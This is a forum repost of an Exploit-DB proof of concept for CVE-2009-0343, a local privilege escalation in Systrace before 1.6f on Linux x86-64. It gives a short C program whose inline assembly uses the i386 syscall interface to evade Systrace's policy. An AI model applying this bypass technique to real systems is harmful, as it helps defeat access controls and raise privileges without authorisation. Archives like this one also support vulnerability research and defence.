Exploit Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32751
Проверка EDB
  1. Пройдено
Автор
CHRIS EVANS
Тип уязвимости
LOCAL
Платформа
LINUX_X86-64
CVE
cve-2009-0343
Дата публикации
2009-01-23
C:
/*
source: https://www.securityfocus.com/bid/33417/info

Systrace is prone to a local privilege-escalation vulnerability.

A local attacker may be able to exploit this issue to bypass access control restrictions and make unintended system calls, which may result in an elevation of privileges.

Versions prior to Systrace 1.6f are vulnerable.
*/

int
main(int argc, const char* argv[])
{
  /* Syscall 1 is exit on i386 but write on x86_64. */
  asm volatile("movl $1, %eax\n"
               "int $0x80\n");
  for (;;);
}
 
Источник
www.exploit-db.com

Похожие темы